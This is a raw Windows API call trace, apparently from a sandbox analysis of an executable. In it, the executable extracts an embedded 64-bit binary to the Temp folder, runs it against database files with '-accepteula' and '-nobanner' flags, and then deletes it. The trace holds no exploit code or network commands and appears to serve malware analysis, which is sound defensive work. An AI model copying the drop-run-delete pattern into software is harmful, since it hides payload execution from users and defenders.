cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0090.384] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0090.384] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0090.384] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¥ëÑæäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0090.384] GetLastError () returned 0x0 [0090.385] SetLastError (dwErrCode=0x0) [0090.385] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0090.385] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0090.385] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0090.385] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0090.385] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¥ëÑæäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0090.386] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x288248 [0090.386] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0090.386] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0090.386] RtlSizeHeap (HeapHandle=0x270000, Flags=0x0, MemoryPointer=0x288248) returned 0x80 [0090.387] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0090.387] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0090.387] GetCurrentProcess () returned 0xffffffff [0090.387] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0090.387] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0090.387] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0090.389] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0090.389] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0090.389] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0090.389] LockResource (hResData=0x43c648) returned 0x43c648 [0090.389] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2882d0 [0090.390] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0090.406] GetFileType (hFile=0x94) returned 0x1 [0090.406] WriteFile (in: hFile=0x94, lpBuffer=0x43c648*, nNumberOfBytesToWrite=0x37000, lpNumberOfBytesWritten=0x18df04, lpOverlapped=0x0 | out: lpBuffer=0x43c648*, lpNumberOfBytesWritten=0x18df04*=0x37000, lpOverlapped=0x0) returned 1 [0090.411] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1000) returned 0x289828 [0090.411] WriteFile (in: hFile=0x94, lpBuffer=0x289828*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x18df00, lpOverlapped=0x0 | out: lpBuffer=0x289828*, lpNumberOfBytesWritten=0x18df00*=0x490, lpOverlapped=0x0) returned 1 [0090.411] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x289828 | out: hHeap=0x270000) returned 1 [0090.412] CloseHandle (hObject=0x94) returned 1 [0090.412] GetCommandLineW () returned="tdq963ii.exe -accepteula \"RacDatabase.sdf\" -nobanner" [0090.412] CreateProcessW (in: lpApplicationName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe", lpCommandLine="tdq963ii.exe -accepteula \"RacDatabase.sdf\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18facc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fb10 | out: lpCommandLine="tdq963ii.exe -accepteula \"RacDatabase.sdf\" -nobanner", lpProcessInformation=0x18fb10*(hProcess=0x98, hThread=0x94, dwProcessId=0x344, dwThreadId=0x8dc)) returned 1 [0090.751] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0xffffffff) returned 0x0 [0163.641] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe")) returned 1 [0164.175] CloseHandle (hObject=0x98) returned 1 [0164.668] CloseHandle (hObject=0x94) returned 1 [0164.697] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x287818 | out: hHeap=0x270000) returned 1 [0164.697] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0164.698] ExitProcess (uExitCode=0x0) [0164.699] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2860d0 | out: hHeap=0x270000) returned 1 Process: id = "22" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x39fad000" os_pid = "0x85c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0xa84" cmd_line = "tdq963ii.exe -accepteula \"RacWmiDatabase.sdf\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 43 os_tid = 0x80c [0088.865] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0089.082] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0089.083] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0089.083] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0089.083] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0089.083] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0089.083] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0089.083] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0089.083] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0089.083] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0089.083] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0089.083] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0089.083] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0089.083] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0089.084] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0089.084] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0089.084] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0089.084] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0089.084] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0089.084] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0089.084] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0089.084] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0089.084] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0089.084] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0089.085] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0089.085] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0089.085] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0089.085] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0089.085] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0089.085] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0089.085] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0089.085] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0089.085] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0089.085] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0089.086] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0089.086] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0089.086] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0089.086] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0089.086] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0089.086] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0089.086] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0089.086] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0089.086] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0089.086] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0089.086] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0089.086] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0089.086] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0089.087] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0089.087] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0089.087] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0089.087] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0089.087] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0089.087] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0089.087] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0089.087] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0089.087] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0089.087] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0089.087] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0089.087] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0089.088] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0089.088] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0089.088] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0089.088] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0089.088] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0089.088] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0089.088] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0089.088] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0089.088] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0089.088] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0089.088] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0089.089] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0089.089] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0089.089] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0089.089] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0089.089] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0089.089] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0089.089] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0089.089] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0089.089] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0089.097] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0089.097] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0089.097] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0089.097] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0089.097] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0089.097] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0089.097] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0089.098] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0089.098] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0089.098] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0089.098] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0089.098] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0089.098] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0089.099] GetProcAddress 